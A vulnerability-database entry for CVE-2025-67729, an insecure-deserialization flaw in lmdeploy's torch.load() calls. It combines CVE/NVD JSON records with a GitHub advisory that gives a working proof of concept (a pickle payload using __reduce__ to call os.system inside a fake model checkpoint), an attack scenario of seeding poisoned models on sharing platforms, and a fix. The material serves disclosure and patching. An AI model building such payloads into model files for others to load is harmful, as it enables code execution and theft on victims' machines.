CVE-2025-67729 (GCVE-0-2025-67729)

Vulnerability from cvelistv5

Published

2025-12-26 21:54

Modified

2025-12-26 22:10

Severity ?

8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-502 - Deserialization of Untrusted Data

Summary

LMDeploy is a toolkit for compressing, deploying, and serving LLMs. Prior to version 0.11.1, an insecure deserialization vulnerability exists in lmdeploy where torch.load() is called without the weights_only=True parameter when loading model checkpoint files. This allows an attacker to execute arbitrary code on the victim's machine when they load a malicious .bin or .pt model file. This issue has been patched in version 0.11.1.

References

URL

Tags

	security-advisories@github.com	https://github.com/InternLM/lmdeploy/commit/eb04b4281c5784a5cff5ea639c8f96b33b3ae5ee
	security-advisories@github.com	https://github.com/InternLM/lmdeploy/security/advisories/GHSA-9pf3-7rrr-x5jh
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/InternLM/lmdeploy/security/advisories/GHSA-9pf3-7rrr-x5jh

Impacted products

	Vendor	Product	Version
	InternLM	lmdeploy	Version: < 0.11.1

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-67729",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-12-26T22:00:24.502538Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-12-26T22:10:54.833Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/InternLM/lmdeploy/security/advisories/GHSA-9pf3-7rrr-x5jh"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "lmdeploy",
          "vendor": "InternLM",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 0.11.1"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "LMDeploy is a toolkit for compressing, deploying, and serving LLMs. Prior to version 0.11.1, an insecure deserialization vulnerability exists in lmdeploy where torch.load() is called without the weights_only=True parameter when loading model checkpoint files. This allows an attacker to execute arbitrary code on the victim\u0027s machine when they load a malicious .bin or .pt model file. This issue has been patched in version 0.11.1."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-502",
              "description": "CWE-502: Deserialization of Untrusted Data",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-12-26T21:54:10.137Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/InternLM/lmdeploy/security/advisories/GHSA-9pf3-7rrr-x5jh",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/InternLM/lmdeploy/security/advisories/GHSA-9pf3-7rrr-x5jh"
        },
        {
          "name": "https://github.com/InternLM/lmdeploy/commit/eb04b4281c5784a5cff5ea639c8f96b33b3ae5ee",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/InternLM/lmdeploy/commit/eb04b4281c5784a5cff5ea639c8f96b33b3ae5ee"
        }
      ],
      "source": {
        "advisory": "GHSA-9pf3-7rrr-x5jh",
        "discovery": "UNKNOWN"
      },
      "title": "lmdeploy vulnerable to Arbitrary Code Execution via Insecure Deserialization in torch.load()"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-67729",
    "datePublished": "2025-12-26T21:54:10.137Z",
    "dateReserved": "2025-12-10T20:04:28.290Z",
    "dateUpdated": "2025-12-26T22:10:54.833Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-67729\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-12-26T22:15:52.437\",\"lastModified\":\"2025-12-26T22:15:52.437\",\"vulnStatus\":\"Received\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"LMDeploy is a toolkit for compressing, deploying, and serving LLMs. Prior to version 0.11.1, an insecure deserialization vulnerability exists in lmdeploy where torch.load() is called without the weights_only=True parameter when loading model checkpoint files. This allows an attacker to execute arbitrary code on the victim\u0027s machine when they load a malicious .bin or .pt model file. This issue has been patched in version 0.11.1.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\",\"baseScore\":8.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-502\"}]}],\"references\":[{\"url\":\"https://github.com/InternLM/lmdeploy/commit/eb04b4281c5784a5cff5ea639c8f96b33b3ae5ee\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/InternLM/lmdeploy/security/advisories/GHSA-9pf3-7rrr-x5jh\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/InternLM/lmdeploy/security/advisories/GHSA-9pf3-7rrr-x5jh\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-67729\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-12-26T22:00:24.502538Z\"}}}], \"references\": [{\"url\": \"https://github.com/InternLM/lmdeploy/security/advisories/GHSA-9pf3-7rrr-x5jh\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-12-26T22:00:26.782Z\"}}], \"cna\": {\"title\": \"lmdeploy vulnerable to Arbitrary Code Execution via Insecure Deserialization in torch.load()\", \"source\": {\"advisory\": \"GHSA-9pf3-7rrr-x5jh\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 8.8, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"InternLM\", \"product\": \"lmdeploy\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 0.11.1\"}]}], \"references\": [{\"url\": \"https://github.com/InternLM/lmdeploy/security/advisories/GHSA-9pf3-7rrr-x5jh\", \"name\": \"https://github.com/InternLM/lmdeploy/security/advisories/GHSA-9pf3-7rrr-x5jh\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/InternLM/lmdeploy/commit/eb04b4281c5784a5cff5ea639c8f96b33b3ae5ee\", \"name\": \"https://github.com/InternLM/lmdeploy/commit/eb04b4281c5784a5cff5ea639c8f96b33b3ae5ee\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"LMDeploy is a toolkit for compressing, deploying, and serving LLMs. Prior to version 0.11.1, an insecure deserialization vulnerability exists in lmdeploy where torch.load() is called without the weights_only=True parameter when loading model checkpoint files. This allows an attacker to execute arbitrary code on the victim\u0027s machine when they load a malicious .bin or .pt model file. This issue has been patched in version 0.11.1.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-502\", \"description\": \"CWE-502: Deserialization of Untrusted Data\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-12-26T21:54:10.137Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2025-67729\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-12-26T22:10:54.833Z\", \"dateReserved\": \"2025-12-10T20:04:28.290Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-12-26T21:54:10.137Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

fkie_cve-2025-67729

Vulnerability from fkie_nvd

Published

2025-12-26 22:15

Modified

2025-12-26 22:15

Severity ?

8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/InternLM/lmdeploy/commit/eb04b4281c5784a5cff5ea639c8f96b33b3ae5ee
	security-advisories@github.com	https://github.com/InternLM/lmdeploy/security/advisories/GHSA-9pf3-7rrr-x5jh
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/InternLM/lmdeploy/security/advisories/GHSA-9pf3-7rrr-x5jh

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "LMDeploy is a toolkit for compressing, deploying, and serving LLMs. Prior to version 0.11.1, an insecure deserialization vulnerability exists in lmdeploy where torch.load() is called without the weights_only=True parameter when loading model checkpoint files. This allows an attacker to execute arbitrary code on the victim\u0027s machine when they load a malicious .bin or .pt model file. This issue has been patched in version 0.11.1."
    }
  ],
  "id": "CVE-2025-67729",
  "lastModified": "2025-12-26T22:15:52.437",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.9,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2025-12-26T22:15:52.437",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/InternLM/lmdeploy/commit/eb04b4281c5784a5cff5ea639c8f96b33b3ae5ee"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/InternLM/lmdeploy/security/advisories/GHSA-9pf3-7rrr-x5jh"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "url": "https://github.com/InternLM/lmdeploy/security/advisories/GHSA-9pf3-7rrr-x5jh"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Received",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-502"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

ghsa-9pf3-7rrr-x5jh

Vulnerability from github

Published

2025-12-26 17:34

Modified

2025-12-27 01:08

Severity ?

8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Summary

lmdeploy vulnerable to Arbitrary Code Execution via Insecure Deserialization in torch.load()

Details

Summary

An insecure deserialization vulnerability exists in lmdeploy where torch.load() is called without the weights_only=True parameter when loading model checkpoint files. This allows an attacker to execute arbitrary code on the victim's machine when they load a malicious .bin or .pt model file.

CWE: CWE-502 - Deserialization of Untrusted Data

Details

Several locations in lmdeploy use torch.load() without the recommended weights_only=True security parameter. PyTorch's torch.load() uses Python's pickle module internally, which can execute arbitrary code during deserialization.

Vulnerable Locations

1. lmdeploy/vl/model/utils.py (Line 22)

python def load_weight_ckpt(ckpt: str) -> Dict[str, torch.Tensor]: """Load checkpoint.""" if ckpt.endswith('.safetensors'): return load_file(ckpt) # Safe - uses safetensors else: return torch.load(ckpt) # ← VULNERABLE: no weights_only=True

2. lmdeploy/turbomind/deploy/loader.py (Line 122)

python class PytorchLoader(BaseLoader): def items(self): params = defaultdict(dict) for shard in self.shards: misc = {} tmp = torch.load(shard, map_location='cpu') # ← VULNERABLE

Additional vulnerable locations: - lmdeploy/lite/apis/kv_qparams.py:129-130 - lmdeploy/lite/apis/smooth_quant.py:61 - lmdeploy/lite/apis/auto_awq.py:101 - lmdeploy/lite/apis/get_small_sharded_hf.py:41

Note: Secure Pattern Already Exists

The codebase already uses the secure pattern in one location:

```python

lmdeploy/pytorch/weight_loader/model_weight_loader.py:103

state = torch.load(file, weights_only=True, map_location='cpu') # ✓ Secure ```

This shows the fix is already known and can be applied consistently across the codebase.

PoC

Step 1: Create a Malicious Checkpoint File

Save this as create_malicious_checkpoint.py:

```python

!/usr/bin/env python3

""" Creates a malicious PyTorch checkpoint that executes code when loaded. """ import pickle import os

class MaliciousPayload: """Executes arbitrary code during pickle deserialization."""

def __init__(self, command):
    self.command = command

def __reduce__(self):
    # This is called during unpickling - returns (callable, args)
    return (os.system, (self.command,))

def create_malicious_checkpoint(output_path, command): """Create a malicious checkpoint file.""" malicious_state_dict = { 'model.layer.weight': MaliciousPayload(command), 'config': {'hidden_size': 768} }

with open(output_path, 'wb') as f:
    pickle.dump(malicious_state_dict, f)

print(f"[+] Created malicious checkpoint: {output_path}")

if name == "main": os.makedirs("malicious_model", exist_ok=True) create_malicious_checkpoint( "malicious_model/pytorch_model.bin", "echo '[PoC] Arbitrary code executed! - RCE confirmed'" ) ```

Step 2: Load the Malicious File (Simulates lmdeploy's Behavior)

Save this as exploit.py:

```python

!/usr/bin/env python3

""" Demonstrates the vulnerability by loading the malicious checkpoint. This simulates what happens when lmdeploy loads an untrusted model. """ import pickle

def unsafe_load(path): """Simulates torch.load() without weights_only=True.""" # torch.load() uses pickle internally, so this is equivalent with open(path, 'rb') as f: return pickle.load(f)

if name == "main": print("[] Loading malicious checkpoint...") print("[] This simulates: torch.load(ckpt) in lmdeploy") print("-" * 50)

result = unsafe_load("malicious_model/pytorch_model.bin")

print("-" * 50)
print(f"[!] Checkpoint loaded. Keys: {list(result.keys())}")
print("[!] If you see the PoC message above, RCE is confirmed!")

```

Step 3: Run the PoC

```bash

Create the malicious checkpoint

python create_malicious_checkpoint.py

Exploit - triggers code execution

python exploit.py ```

Expected Output

``` [+] Created malicious checkpoint: malicious_model/pytorch_model.bin [] Loading malicious checkpoint... [] This simulates: torch.load(ckpt) in lmdeploy

[PoC] Arbitrary code executed! - RCE confirmed ← Code executed here!

[!] Checkpoint loaded. Keys: ['model.layer.weight', 'config'] [!] If you see the PoC message above, RCE is confirmed! ```

The [PoC] Arbitrary code executed! message proves that arbitrary shell commands run during deserialization.

Impact

Who Is Affected?

All users who load PyTorch model files (.bin, .pt) from untrusted sources
This includes models downloaded from HuggingFace, ModelScope, or shared by third parties

Attack Scenario

Attacker creates a malicious model file (e.g., pytorch_model.bin) containing a pickle payload
Attacker distributes it as a "fine-tuned model" on model sharing platforms or directly to victims
Victim downloads and loads the model using lmdeploy
Malicious code executes with the victim's privileges

Potential Consequences

Remote Code Execution (RCE) - Full system compromise
Data theft - Access to sensitive files, credentials, API keys
Lateral movement - Pivot to other systems in cloud environments
Cryptomining or ransomware - Malware deployment

Recommended Fix

Add weights_only=True to all torch.load() calls:

```diff

lmdeploy/vl/model/utils.py:22

return torch.load(ckpt)
return torch.load(ckpt, weights_only=True)

lmdeploy/turbomind/deploy/loader.py:122

tmp = torch.load(shard, map_location='cpu')
tmp = torch.load(shard, map_location='cpu', weights_only=True)

Apply the same pattern to:

- lmdeploy/lite/apis/kv_qparams.py:129-130

- lmdeploy/lite/apis/smooth_quant.py:61

- lmdeploy/lite/apis/auto_awq.py:101

- lmdeploy/lite/apis/get_small_sharded_hf.py:41

```

Alternatively, consider migrating fully to SafeTensors format, which is already supported in the codebase and immune to this vulnerability class.

Resources

Official PyTorch Security Documentation

PyTorch torch.load() Documentation

"torch.load() uses pickle module implicitly, which is known to be insecure. It is possible to construct malicious pickle data which will execute arbitrary code during unpickling. Never load data that could have come from an untrusted source."

Related CVEs

| CVE | Description | CVSS | |-----|-------------|------| | CVE-2025-32434 | PyTorch torch.load() RCE vulnerability | 9.3 Critical | | CVE-2024-5452 | PyTorch Lightning insecure deserialization | 8.8 High |

Additional Resources

Thank you for your time reviewing this report. I'm happy to provide any additional information or help with testing the fix. Please let me know if you have any questions!

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.11"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "lmdeploy"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.11.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-67729"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-12-26T17:34:08Z",
    "nvd_published_at": "2025-12-26T22:15:52Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nAn insecure deserialization vulnerability exists in lmdeploy where `torch.load()` is called without the `weights_only=True` parameter when loading model checkpoint files. This allows an attacker to execute arbitrary code on the victim\u0027s machine when they load a malicious `.bin` or `.pt` model file.\n\n\n**CWE:** CWE-502 - Deserialization of Untrusted Data\n\n---\n\n## Details\n\nSeveral locations in lmdeploy use `torch.load()` without the recommended `weights_only=True` security parameter. PyTorch\u0027s `torch.load()` uses Python\u0027s pickle module internally, which can execute arbitrary code during deserialization.\n\n### Vulnerable Locations\n\n**1. `lmdeploy/vl/model/utils.py` (Line 22)**\n\n```python\ndef load_weight_ckpt(ckpt: str) -\u003e Dict[str, torch.Tensor]:\n    \"\"\"Load checkpoint.\"\"\"\n    if ckpt.endswith(\u0027.safetensors\u0027):\n        return load_file(ckpt)  # Safe - uses safetensors\n    else:\n        return torch.load(ckpt)  # \u2190 VULNERABLE: no weights_only=True\n```\n\n**2. `lmdeploy/turbomind/deploy/loader.py` (Line 122)**\n\n```python\nclass PytorchLoader(BaseLoader):\n    def items(self):\n        params = defaultdict(dict)\n        for shard in self.shards:\n            misc = {}\n            tmp = torch.load(shard, map_location=\u0027cpu\u0027)  # \u2190 VULNERABLE\n```\n\n**Additional vulnerable locations:**\n- `lmdeploy/lite/apis/kv_qparams.py:129-130`\n- `lmdeploy/lite/apis/smooth_quant.py:61`\n- `lmdeploy/lite/apis/auto_awq.py:101`\n- `lmdeploy/lite/apis/get_small_sharded_hf.py:41`\n\n### Note: Secure Pattern Already Exists\n\nThe codebase already uses the secure pattern in one location:\n\n```python\n# lmdeploy/pytorch/weight_loader/model_weight_loader.py:103\nstate = torch.load(file, weights_only=True, map_location=\u0027cpu\u0027)  # \u2713 Secure\n```\n\nThis shows the fix is already known and can be applied consistently across the codebase.\n\n---\n\n## PoC\n\n### Step 1: Create a Malicious Checkpoint File\n\nSave this as `create_malicious_checkpoint.py`:\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nCreates a malicious PyTorch checkpoint that executes code when loaded.\n\"\"\"\nimport pickle\nimport os\n\nclass MaliciousPayload:\n    \"\"\"Executes arbitrary code during pickle deserialization.\"\"\"\n    \n    def __init__(self, command):\n        self.command = command\n    \n    def __reduce__(self):\n        # This is called during unpickling - returns (callable, args)\n        return (os.system, (self.command,))\n\ndef create_malicious_checkpoint(output_path, command):\n    \"\"\"Create a malicious checkpoint file.\"\"\"\n    malicious_state_dict = {\n        \u0027model.layer.weight\u0027: MaliciousPayload(command),\n        \u0027config\u0027: {\u0027hidden_size\u0027: 768}\n    }\n    \n    with open(output_path, \u0027wb\u0027) as f:\n        pickle.dump(malicious_state_dict, f)\n    \n    print(f\"[+] Created malicious checkpoint: {output_path}\")\n\nif __name__ == \"__main__\":\n    os.makedirs(\"malicious_model\", exist_ok=True)\n    create_malicious_checkpoint(\n        \"malicious_model/pytorch_model.bin\",\n        \"echo \u0027[PoC] Arbitrary code executed! - RCE confirmed\u0027\"\n    )\n```\n\n### Step 2: Load the Malicious File (Simulates lmdeploy\u0027s Behavior)\n\nSave this as `exploit.py`:\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nDemonstrates the vulnerability by loading the malicious checkpoint.\nThis simulates what happens when lmdeploy loads an untrusted model.\n\"\"\"\nimport pickle\n\ndef unsafe_load(path):\n    \"\"\"Simulates torch.load() without weights_only=True.\"\"\"\n    # torch.load() uses pickle internally, so this is equivalent\n    with open(path, \u0027rb\u0027) as f:\n        return pickle.load(f)\n\nif __name__ == \"__main__\":\n    print(\"[*] Loading malicious checkpoint...\")\n    print(\"[*] This simulates: torch.load(ckpt) in lmdeploy\")\n    print(\"-\" * 50)\n    \n    result = unsafe_load(\"malicious_model/pytorch_model.bin\")\n    \n    print(\"-\" * 50)\n    print(f\"[!] Checkpoint loaded. Keys: {list(result.keys())}\")\n    print(\"[!] If you see the PoC message above, RCE is confirmed!\")\n```\n\n### Step 3: Run the PoC\n\n```bash\n# Create the malicious checkpoint\npython create_malicious_checkpoint.py\n\n# Exploit - triggers code execution\npython exploit.py\n```\n\n### Expected Output\n\n```\n[+] Created malicious checkpoint: malicious_model/pytorch_model.bin\n[*] Loading malicious checkpoint...\n[*] This simulates: torch.load(ckpt) in lmdeploy\n--------------------------------------------------\n[PoC] Arbitrary code executed! - RCE confirmed     \u2190 Code executed here!\n--------------------------------------------------\n[!] Checkpoint loaded. Keys: [\u0027model.layer.weight\u0027, \u0027config\u0027]\n[!] If you see the PoC message above, RCE is confirmed!\n```\n\nThe `[PoC] Arbitrary code executed!` message proves that arbitrary shell commands run during deserialization.\n\n---\n\n## Impact\n\n### Who Is Affected?\n\n- **All users** who load PyTorch model files (`.bin`, `.pt`) from untrusted sources\n- This includes models downloaded from HuggingFace, ModelScope, or shared by third parties\n\n### Attack Scenario\n\n1. Attacker creates a malicious model file (e.g., `pytorch_model.bin`) containing a pickle payload\n2. Attacker distributes it as a \"fine-tuned model\" on model sharing platforms or directly to victims\n3. Victim downloads and loads the model using lmdeploy\n4. Malicious code executes with the victim\u0027s privileges\n\n### Potential Consequences\n\n- **Remote Code Execution (RCE)** - Full system compromise\n- **Data theft** - Access to sensitive files, credentials, API keys\n- **Lateral movement** - Pivot to other systems in cloud environments\n- **Cryptomining or ransomware** - Malware deployment\n\n---\n\n## Recommended Fix\n\nAdd `weights_only=True` to all `torch.load()` calls:\n\n```diff\n# lmdeploy/vl/model/utils.py:22\n- return torch.load(ckpt)\n+ return torch.load(ckpt, weights_only=True)\n\n# lmdeploy/turbomind/deploy/loader.py:122\n- tmp = torch.load(shard, map_location=\u0027cpu\u0027)\n+ tmp = torch.load(shard, map_location=\u0027cpu\u0027, weights_only=True)\n\n# Apply the same pattern to:\n# - lmdeploy/lite/apis/kv_qparams.py:129-130\n# - lmdeploy/lite/apis/smooth_quant.py:61\n# - lmdeploy/lite/apis/auto_awq.py:101\n# - lmdeploy/lite/apis/get_small_sharded_hf.py:41\n```\n\nAlternatively, consider migrating fully to SafeTensors format, which is already supported in the codebase and immune to this vulnerability class.\n\n---\n\n## Resources\n\n### Official PyTorch Security Documentation\n\n- **[PyTorch torch.load() Documentation](https://pytorch.org/docs/stable/generated/torch.load.html)**\n  \n  \u003e *\"torch.load() uses pickle module implicitly, which is known to be insecure. It is possible to construct malicious pickle data which will execute arbitrary code during unpickling. Never load data that could have come from an untrusted source.\"*\n\n### Related CVEs\n\n| CVE | Description | CVSS |\n|-----|-------------|------|\n| [CVE-2025-32434](https://nvd.nist.gov/vuln/detail/CVE-2025-32434) | PyTorch `torch.load()` RCE vulnerability | **9.3 Critical** |\n| [CVE-2024-5452](https://nvd.nist.gov/vuln/detail/CVE-2024-5452) | PyTorch Lightning insecure deserialization | **8.8 High** |\n\n### Additional Resources\n\n- [CWE-502: Deserialization of Untrusted Data](https://cwe.mitre.org/data/definitions/502.html)\n- [Trail of Bits: Exploiting ML Pickle Files](https://blog.trailofbits.com/2021/03/15/never-a-dill-moment-exploiting-machine-learning-pickle-files/)\n- [Rapid7: Attackers Weaponizing AI Models](https://www.rapid7.com/blog/post/2024/02/06/attackers-are-weaponizing-ai-model-files/)\n\n---\n\nThank you for your time reviewing this report. I\u0027m happy to provide any additional information or help with testing the fix. Please let me know if you have any questions!",
  "id": "GHSA-9pf3-7rrr-x5jh",
  "modified": "2025-12-27T01:08:38Z",
  "published": "2025-12-26T17:34:08Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/InternLM/lmdeploy/security/advisories/GHSA-9pf3-7rrr-x5jh"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67729"
    },
    {
      "type": "WEB",
      "url": "https://github.com/InternLM/lmdeploy/commit/eb04b4281c5784a5cff5ea639c8f96b33b3ae5ee"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/InternLM/lmdeploy"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "lmdeploy vulnerable to Arbitrary Code Execution via Insecure Deserialization in torch.load()"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

CVE-2025-67729 (GCVE-0-2025-67729)

Vulnerability from cvelistv5

fkie_cve-2025-67729

Vulnerability from fkie_nvd

ghsa-9pf3-7rrr-x5jh

Vulnerability from github

Summary

Details

Vulnerable Locations

Note: Secure Pattern Already Exists

lmdeploy/pytorch/weight_loader/model_weight_loader.py:103

PoC

Step 1: Create a Malicious Checkpoint File

!/usr/bin/env python3

Step 2: Load the Malicious File (Simulates lmdeploy's Behavior)

!/usr/bin/env python3

Step 3: Run the PoC

Create the malicious checkpoint

Exploit - triggers code execution

Expected Output

[PoC] Arbitrary code executed! - RCE confirmed ← Code executed here!

Impact

Who Is Affected?

Attack Scenario

Potential Consequences

Recommended Fix

lmdeploy/vl/model/utils.py:22

lmdeploy/turbomind/deploy/loader.py:122

Apply the same pattern to:

- lmdeploy/lite/apis/kv_qparams.py:129-130

- lmdeploy/lite/apis/smooth_quant.py:61

- lmdeploy/lite/apis/auto_awq.py:101

- lmdeploy/lite/apis/get_small_sharded_hf.py:41

Resources

Official PyTorch Security Documentation

Related CVEs

Additional Resources

Tags

Sightings

Nomenclature